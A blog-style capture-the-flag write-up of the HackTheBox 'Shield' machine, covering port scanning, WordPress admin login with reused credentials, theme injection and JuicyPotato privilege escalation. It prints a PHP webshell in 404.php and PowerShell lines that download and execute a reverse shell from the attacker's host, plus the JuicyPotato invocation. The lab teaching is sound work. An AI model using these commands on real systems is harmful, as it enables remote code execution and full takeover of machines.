Logo
HackTheBox - Shield Writeup

HackTheBox - Shield Writeup

SH∆FIQ∆IM∆N SH∆FIQ∆IM∆N
July 21, 2021
1 min read
index

Enumeration

  • scan top 1000 ports
  • the result
Terminal window
nmap -sC -sV -oN nmap/initial 10.10.10.29

nmap initial scan

nmap initial scan

  • scan all ports
  • the result
Terminal window
nmap -sC -sV -p- -oN nmap/all_ports 10.10.10.29

nmap allports scan

nmap allports scan

  • all scan still the same
  • open ports
    • 80 / http
    • 3306 / mysql

WebPage

  • Just default windows server page

IIS default page

IIS default page

Gobuster

  • Using gobuster to find any hidden directory
  • the result

gobuster

gobuster

WordPress

  • the result show this server have wordpress install
  • as we know, the wordpress login path is /wp-admin
  • let’s take a look

Admin Login

  • Try to login as admin with credentials from previous box vaccine
  • Success

wordpress admin

wordpress admin

Foothold/Gaining Access

WordPress Theme Injection

  • Let’s try get the reverse shell by injected the theme
  • I’m gonna use this theme “GutenBooster”
    • and the shell I’m gonna use Nishang
  • Now, I’m gonna put command in the 404.php.
  • Which is a 404 template
  • Source
<?php
exec('powershell IEX(IWR http://10.10.16.13:8000/rev.ps1 -UseBasicParsing)')
?>
  • This command will download the reverse shell and execute it

get shell

get shell

  • Well, the reverse shell is succefully execute

SeImpersonatePrivilege

  • everytime you’ve got powershell reverse shell

  • make sure to run

    • whoami /all
  • The result

SeImpersonatePrivilege token

SeImpersonatePrivilege token

  • Looks like SeImpersonatePrivilege is enable
  • We can privesc by using juicy potato
  • Source
  • download the binary into local machine. Then, upload into victim machine
  • via this command
Terminal window
IWR http://10.10.16.34:8000/JuicyPotato.exe -outfile again_gimme.exe
  • then run the binary.
  • the result

juicy potato

juicy potato

Privilege Escalation

  • First, I’m gonna make bat file with powershell command on it.
  • I’m called the file yo_my.bat
  • the command:
  • Source
Terminal window
powershell "(IEX(IWR http://10.10.16.34:8000/rev.ps1 -UseBasicParsing))"

POTATO

  • I’m gonna run again_gimme.exe again with this flag:

    • ./again_gimme.exe -t * -p yo_my.bat -l 9902
  • the result

juicy potato failed

juicy potato failed

check OS version

check OS version

Terminal window
.\again_gimme.exe -t * -p yo_my.bat -l 9902 -c '{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}'
Summary

Make sure you’re running the nc for listening the connection
REMEMBER: The powershell command in the bat file was downloading another reverse shell file called rev.ps1. in that file. I’m listening on 9901. If you listen on the other port. Just change the port on that file.

  • the result

shell as nt authority\system

shell as nt authority\system

  • we’ve got the root flag

root flag

root flag

Conclusion

I’ve learned a lot today. Do not put any credentials on the exposure machine to the hacker or non-secure machine. Even tho it’s happened, quickly change the password. I’m also introducing a bunch of tools for windows pentest/hack. Lastly, always update and patch the machine.

I have a fun time doing this machine and I hope you guys do too. Bye ;)